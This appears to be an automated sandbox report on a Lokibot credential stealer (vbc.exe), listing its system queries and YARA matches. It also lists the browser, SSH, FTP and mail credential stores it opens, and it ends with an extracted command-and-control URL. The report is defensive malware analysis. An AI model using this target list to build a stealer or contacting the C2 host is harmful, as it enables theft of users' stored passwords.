Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: GetLocaleInfoW,4_2_004A3222
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_004B12D6
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: _GetPrimaryLen,EnumSystemLocalesW,4_2_004B234F
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004B276A
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: EnumSystemLocalesW,4_2_004B230F
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: _GetPrimaryLen,EnumSystemLocalesW,4_2_004B23CC
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004A4CEB cpuid 4_2_004A4CEB
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.db VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004A962E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_004A962E
Contains functionality to query time zone information
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: 4_2_004AF9A3 __getenv_helper_nolock,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_004AF9A3
Queries the cryptographic machine GUID
Source: C:\Users\user\AppData\Roaming\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match File source: 00000004.00000002.1388284564.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2328, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.db
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.db
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.db
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\AppData\Roaming\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: PopPassword 4_2_0040D069
Source: C:\Users\user\AppData\Roaming\vbc.exe Code function: SmtpPassword 4_2_0040D069

Malware Configuration

Threatname: Lokibot

{"c2:": "http://toyo-at-jp.info/ig1/fre.php"}

Behavior Graph
